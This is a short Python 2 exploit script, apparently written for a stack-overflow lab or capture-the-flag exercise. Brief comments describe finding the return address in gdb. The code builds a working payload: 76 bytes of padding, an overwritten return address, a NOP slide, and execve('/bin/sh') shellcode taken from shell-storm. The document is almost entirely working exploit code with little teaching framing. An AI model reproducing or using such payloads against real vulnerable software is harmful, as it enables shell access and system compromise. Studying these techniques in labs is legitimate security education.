#to get the shell code from https://shell-storm.org/shellcode/files/shellcode-811.php
#set 2 breakpoints at leave and ret and consider the $esp when breakpoint is at ret
# x/2x $ebp
#0xbffff718:     0xbffff798      0xb7eadc76 <- this is the return address
#calculate the padding using ebp - esp which is roughly 76bytes


import struct
padding = "A"*76
eip = struct.pack("I", 0xbffff770 + 30)
nopslide = "\x90"*100
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

print padding + eip + nopslide + shellcode
